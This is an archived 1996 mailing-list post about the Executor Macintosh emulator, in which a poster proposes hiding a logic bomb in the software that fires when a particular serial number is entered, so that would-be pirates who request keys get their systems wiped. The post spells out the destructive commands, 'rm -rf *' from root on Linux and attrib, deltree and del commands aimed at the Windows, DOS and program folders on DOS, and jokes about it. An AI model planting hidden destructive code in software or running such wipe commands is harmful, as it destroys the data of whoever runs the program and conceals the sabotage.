home *** CD-ROM | disk | FTP | other *** search
/ Executor 2.0 / executorv2.0.iso / pc / dos / extra / docs / maillist / text / archive.96 / text7705.txt < prev    next >
Encoding:
Text File  |  1996-07-25  |  902 b   |  32 lines

  1. To: executor@ardi.com
  2. X-MailNews-Gateway: From newsgroup comp.emulators.mac.executor
  3. Sender: owner-executor@ardi.com
  4. Precedence: bulk
  5.  
  6. Include some code in the unlockable versions that will
  7. 'do a little mischief'.  Something like 
  8.  
  9. cd /
  10. rm -rf * for linux and the following for the DOS version
  11.  
  12. cd\
  13. attrib -rhs c:\*.*
  14. deltree /y c:\windows
  15. deltree /y c:\dos
  16. deltree /y c:\executor
  17. del c:\*.*
  18.  
  19. Make this code execute when a specific serial# is entered.
  20. Then when some dweeb criminal posts a 'gimme keys please' message,
  21. just mail him the destructive keys and let Executor do the rest.
  22.  
  23. This idea really does
  24.  have some merit;)
  25.  
  26. Then mail them 30 minutes later with a message like, 
  27. "Please can someone send me $150 dollars, I can't wait until we shrink 
  28. wrap E2. Please, this lack of money is a real annoyance when I try to buy 
  29. stuff.  And oh yes... have a nice day:)"
  30.  
  31.  
  32.